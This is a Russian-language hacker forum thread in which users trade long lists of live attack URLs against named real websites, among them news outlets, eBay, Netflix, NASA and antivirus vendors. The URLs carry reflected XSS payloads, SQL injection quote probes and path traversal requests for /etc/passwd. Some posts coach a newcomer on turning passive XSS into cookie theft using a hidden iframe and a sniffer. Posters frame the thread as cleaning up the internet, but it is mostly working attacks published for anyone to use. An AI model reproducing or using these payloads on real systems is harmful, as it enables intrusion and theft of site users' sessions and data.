Бажные сайты от k1b0rg'a
 

Вообщем небольшое предисловие.
Раньше я хотел назвать и тему 667 бажных сайтов, и их действительно столько у меня, но с некоторыми обстоятельствами, я не могу выложить(или выложу потом, по частям.) Все "уязвимости" найдены мною, все совпадения случайности, на момент опубликования, все работало. Естественно я не все крупные ресурсы выложил.
Скачать можно по этой ссылке.
http://kobeluga.narod.ru/bugs.txt

p.s. если кому то помогло, то как отблагодарить знаете(репутация) =)))

ne ploho jdem prodoljeniea banketa

2k1b0rg вот молодчик! секлаб яндекс вебхак рамблер - респект вобщем)

хех, продолжение будет, если данные востановлю после вируса(кто посоветует нормальный антивирус, а то без него хреново)
даже если не востаовлю думаю, я найду способ, еще запостить ;)(скидываем мне в приват сайты) =))

так так значит выложил то наконец=))) с меня репутация!)

Что то я там секлаб не нашёл.

2k00p3r хм... я точно видел секлабу в списке вчера, может k1b0rg удалил или я с sitecity попутал

секлаб был, но так как уже там бага не работает, я ее прикрыл, и веб хак удалил

Где именно была бага на секлабе?

вот хасаса, только реальный алерт вставлять не советую(он вылетит 200+ раз)

еще одна, вылетает, где-то 7

и еще под IE нашёл

http://www.pro-hack.ru/tools/ip.html...pname=&search=
http://geo.webmoney.ru/asp/wmobjects_in_moscow.asp?al=0"><script>alert()</script>
http://zloy.org/news/686'/index.html
http://www.cyberinfo.ru/cgi-bin/prox...t%3E&port=8080
http://skvoznoy.org/news-cat/21'/
http://w-hack.net/index.php?option=content&task=category&sectionid=3 "%20style=background:url(javascript:alert());"&id= 69&Itemid=27
http://www.kkunst.com/kk/print.php?file='
http://top.voffka.com/search.php?key...3E&cat=Overall
http://www.leg.state.fl.us/statutes/...rt%28%29%29%3B
http://search.mcc.ac.uk/cgi-bin/htse...ipt%3E&x=0&y=0
http://koffiejunk.nl/?file=<script>alert()</script>
http://www.oil-gas.com.ua/data/rus/showdoc.php?file=<script>alert()</script>
http://www.frozenlight.de/engine/show.php?file=<script>alert()</script>
http://www.globalschoolbus.com/tools...age.php?file=\
http://www.cairchicago.org/ournews.php?file=<script>alert()</script>
http://chrisken.utacm.org/cksource.p...e/ckSource.php
http://wwwx.cs.unc.edu/~jsterrel/tes...viewsource.php
http://foreverblue.alsgekken.nl/show...rod.ru/nst.php
http://www.nesprogramme.org/download.../../etc/passwd
http://www.bissettmags.com.au/cgi-bi.../../etc/passwd
http://www.frostjedi.com/terra/scrip...e=graemlin.php
http://www.theater-schwedt.de/index....c/passwd&mex=7
http://beer.km.ru/index.php?file=/etc/passwd
http://www.bobdev.com/downloadstats.php?File=<script>alert()</script>
http://www.mercenaries.ru/inf/newcomm.php?type=gallery&nick=%21+%21+%21+MAXIMILI AN+%21+%21+%21"><script>alert()</script>&page=1

Неплохой список могу токо добавить....
http://www.ntv.ru/news/NewsSearchRes...3C%2Fscript%3E
сегодня нашол ...долго смеялся...НТВ всётаки...хеех

Молодец.Так держать.

Да... действительно молодец!

http://www.phrack.org/search/index.php?author=&andor=or&title="%20style=backgro und:url(javascript:alert());"&comment=&submit=subm it
http://www.xakep.ru/local/include/iframe_rateit.asp?filedir=25244"><script>alert()</script>
http://otdell.bs.by/show.html?words=...3C%2Fscript%3E
http://www.missworld.tv/bio/bio.sps?iBiographyID=51851'
http://www.latin.ru/cgi-bin/search/odm.pl?search="><script>alert()</script>
http://yellowpages.rin.ru/cgi-bin/se...ipt%3E&srt=not
http://www.linuxchile.cl/docs.php?op=ver&id=65'
http://www.hw.ru/hi-tech/recordUsers1.jsp?login="><script>alert()</script>
http://www.superq.ru/comments.php?id=82_0_1_0_C"><script>alert()</script>
https://[любой_сайт_использующий_webmo ney_transfer].webmoney.ru/conf/pci_testlink.asp?A=1</xmp><script>alert(1)</script>&b=1<script>alert(2)</script>
http://xtools.org/"%20style=background:url(javascript:alert());".cfm ?nft=1&t=6&p=1

http://netsec.ru/modules.php?name=articles&theme=7</a><script>alert()</script>&page=stat&read=yes&mess=1131536252
http://www.ixbt.com/news/index.php?s...ipt%3E&x=0&y=0
http://news.ntv.ru/74629<script>alert()</script>/
http://www.gazeta.ru/cgi-bin/newexport/export?action=show&uid=0'&cid=1
http://www.pokupaj.ru/pokupaj.php?su...cript%3E&id=92
http://pharma-cosmetics.ru/results.p...3C%2Fscript%3E
http://www.filemirrors.com/search.sr...3C%2Fscript%3E
http://softportal.com/search.php?sea...3C%2Fscript%3E
http://city.zp.ua/search.phtml?searc...ED%E0%E9%F2%E8
http://www.drocher.ru/good.php?rubric_id=29"><script>alert()</script>
http://top.netsec.ru/image2.png?icq=%20288983987&mail=Root@NetSec.ru&na me=Green%20Bear&img=1'
http://de.shareware-download.org/%22...8%29%29%3B.php
http://www.nodevice.ru [POST] sql инъекция в поиске (в 3 параметрах)
http://mirrors.zero-united.com/resul...t%3E&original=
http://viewstat.hotlog.ru/site_stat.php?&HOTLOG_SESSION='
http://hostland.ru/services/domain/c...5%F0%E8%F2%FC+

:mad:
на моем сайте не смотреть, я исправил =))).
спасибо киборг -))

дя? я даже не знал, что он твой.
где-то увидел ссылку решил зайти посмотреть что к чему.
пока я не нашол ни одной уязвимости(из всех сайтов которые я успел просмотрел) на аничате.ру и асечке.ру=))) респект

НЕ доставайте меня с просьбой продать мой сканер, которым я сканирую сайты!!!! у меня его нету, проверяю все РУКАМИ!!!
http://sheriff.md/Search/?Text=%27+s...28%29%29%3B%27
http://www.homegain.com/real_estate/index?ht=pnf_rc&entryid=5803"><script>alert()</script>
http://audio.kavkazcenter.com/review.php?sid=135'><script>alert()</script>
http://aviabilet.ru/avia/avia/avia_searchres_t?SEARCHFOR=<script>alert()</script>&x=0&y=0
http://catalog.begun.ru/?q=%27%22%3E...3C%2Fscript%3E
http://slogan.anub.ru/?slogan="style=background:url(javascript:alert()); "
http://ru-traffic.com/pgo.php?partner=10407&alarm=1&url=><script>alert() </script>
http://www.gsm-shop.com.ua/index.php?cat=58'
http://www.web-hosting.ru/whois.php?...ript%3E&ext=ru

Вот про енто http://audio.kavkazcenter.com/review.php?sid=135'><script>alert()</script> я могу вам так прямо сказать, что наодном форуме(не буду рекламировать) тебе были бы очень благодарны.
Это тот который про террористов.

да мля про эту команду "антитерроров" уже пол-инета знает.

кавказцентр мне насильно дали ссылку =))))
я им выложил, и сюда тож на всяк выложил.
этот баг я нашол на галереи форумов vbulletin, хз но я не видел чтобы до меня кто-то описвал ентот баг, смотри мои сайты, там есть еще парочку сайтов с такой уязвимостью, на них тоже стоит vbulletin.
это не совсем ошибка.
p.s. скоро еще опубликую список бажных сайтов.

Присоединяемся к акции вылечим инет от xss. Вот от меня кое-что
http://www.rap.ru/artists/&pos_id=7143"><script>alert(/kot777/)</script>
http://www.supreme2.ru/s2/diary/comments/comments.php?id=01_10_05'><script>alert(/kot777/)</script>
http://www.e-pravo.ru/search.php?category=12'><script>alert(/kot777/)</script>
http://webz.priop.ru/index.php?categ=%27
http://www.persons.am/ru/search.php?category=19'><script>alert(/kot777/)</script>
http://www.oberon.ru/magazine_page.php?page_id=5"><script>alert(/kot777/)</script>
http://www.exodist.net/index.php?start=70"><script>alert(/kot777/)</script>
http://www.dolgopa.org/index.php?ids=323"><script>alert(/kot777/)</script>
http://gorodok.samaratoday.ru/webpage.php?id=7"><script>alert(/kot777/)</script>

А на http://www.diary.ru/ у тебя часом ничего нет?

и мой скромный

http://mobile.mail.ru/catalog/content_get.php?tab=3&content_id=21161"><script>co nfirm('hi-hi')</script><a%20"

http://www.openet.ru/University.nsf/Index.htm!Open&Menu=VPMain&VPID=965"%20style=backg round:url(javascript:alert());"
http://www.cracklab.ru/xxx/ [POST] " style=background:url(javascript:alert());"
http://www.freedisk.ru/guide.php?cat=11"><script>alert()</script>
http://www.rabota.ru/search/vacancy/?search='"><script>alert()</script>
http://www.forum.md/Albums.aspx?soundslike=<xml>
http://nasa.org/static.asp?search_te...arch_source=20
http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=66&start=11"><script>alert( )</script>
http://www.999.md/results.asp?criter...lng=1&topic=-1
http://search.ebay.com/search/search.dll?sofocus=bs&sbrftog=1&fcl=4&from=R10&cat ref=C12&satitle=fur+trim*&sacat=63862%26catref%3DC 6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=-24<script>alert()</script>&a22868=-24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=1&alist=a54 %2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801&pf_query=fur+t rim*&sargn=-1%26saslc%3D2&sadis=200&fpos=94062&sappl=1&ftrt=1& ftrv=1&sabdlo=&sabdhi=&saprclo="><script>alert(5)</script>&saprchi='"><script>alert(/k1b0rg/)</script>
http://www.diary.ru/interest/?q=%22style=background:url(javascript:alert());"

Вот тчо за Мода пошла что вы с ними делать собираетесь колекционировать?

Насчет http://www.diary.ru/
как я понял там даеться http://www.diary.ru/~вася может вэто вася вставить ну скриптик со снифером?
Тк сайт один же.

http://www.diary.ru/list/?sort=XSS
воть те XSS

а чтобы были, может инет в будующем избавиться от таких глупых ошибок, секьюрити сайты сразу залатали эти баги, после того как я опубликовал.
а сайты типа pro-hack skvoznoy zloy, они нифига не латают.
я хочу чтобы инет, перестал содержать такие ошибки, конечно это нереально такое сделать ,но хоть чучуть я сделаю его почище

Не знаю как вы, но я уважаю "k1b0rg" и этот сайт!!!
Огрромный Респект...........всем его пользователям :)
для k1b0rg
- ну чё там с чатом?! кодта топ дашь?

http://www.wargames.ru/search.php?query=%27
http://www.ccg.ru/sections.php?op=listarticles&secid=285'
http://www.rolemancer.ru/search.php?query=%27
http://rulezzz.dp.ua/fotos/<script>alert()</script>
http://listsoft.ru/search.php?q=%27%...me=yes&tip=yes
http://opengl.net/ поиск "style=background:url(javascript:alert());"
http://www.eurochat.ru/?go=gal&page=7"><script>alert()</script>
http://www.netflix.com/MovieDisplay?movieid=70011207<script>alert()</script>&trkid=135437
http://a9.com/-/search/imageResult?q=666&t=f1263.jpg&ru="style=background :url(javascript:alert(1));&u="style=background:url (javascript:alert(2));&ih=296&iw=425&th=84&tw=122& id=I-RBtbW0cGoJ

k1b0rg

Вопрос лично к тебе, я в нахождение багов новичок, вот нашёл тут одну вешь, может подскажеш как им воспользоватся ?

http://www.mix.az/engine/modules/imagepreview.php?image='

Ну и какая ж там бага? =)

вот бага
http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>alert()</script>
а как воспользоваться ,ищи в поиске "пассивные xss"
здесь описывать не буду, много, ды это прочитай а что непонятное спрашивай.
ОБНОВЛЕНИЕ
http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealer t%281%29%3C%2Fscript%3E&phone=%22%3E%3Cscript%3Eal ert%282%29%3C%2Fscript%3E&j_address=%22%3E%3Cscrip t%3Ealert%283%29%3C%2Fscript%3E&m_address=%22%3E%3 Cscript%3Ealert%284%29%3C%2Fscript%3E&org=%22%3E%3 Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3 Cscript%3Ealert(6)</script>&currency=RUR&act=finish&prodid=01-D
http://www.multitran.ru/c/m.exe?HL=2...3C%2Fscript%3E
http://bugs.php.net/report.php?in%5B...n%5Bactres%5D=
http://www.cafepress.com/cp/search/s...cfpt=&x=26&y=8
http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
http://www.tstyle.ru/price/1001636'
http://xrout.org/index.php поиск "><script>alert()</script>
http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>

Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?

на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил"

k1b0rg глянь сайт www.superchat.ee
говорят что очень хорошо защищён)

Раньше тоже бегал искал потом понял.

Вот тебе XSS на твоем чате
http://www.superchat.ee/cgi-bin/00/User.Info?<script>alert(/XSS/)</script>&info

http://www.superchat.ee/cgi-bin/gallery?cat=M&show="+style%3Dbackground:url(javasc ript:alert());"
вот тебе еще код
хаха, сделали защиту от =.
и ваще люди, когда вы говорите найдите мне уязвимость, то не надо потом кричать как ею воспользоваться!

http://www.hackthissite.org

Найди мне багу здесь.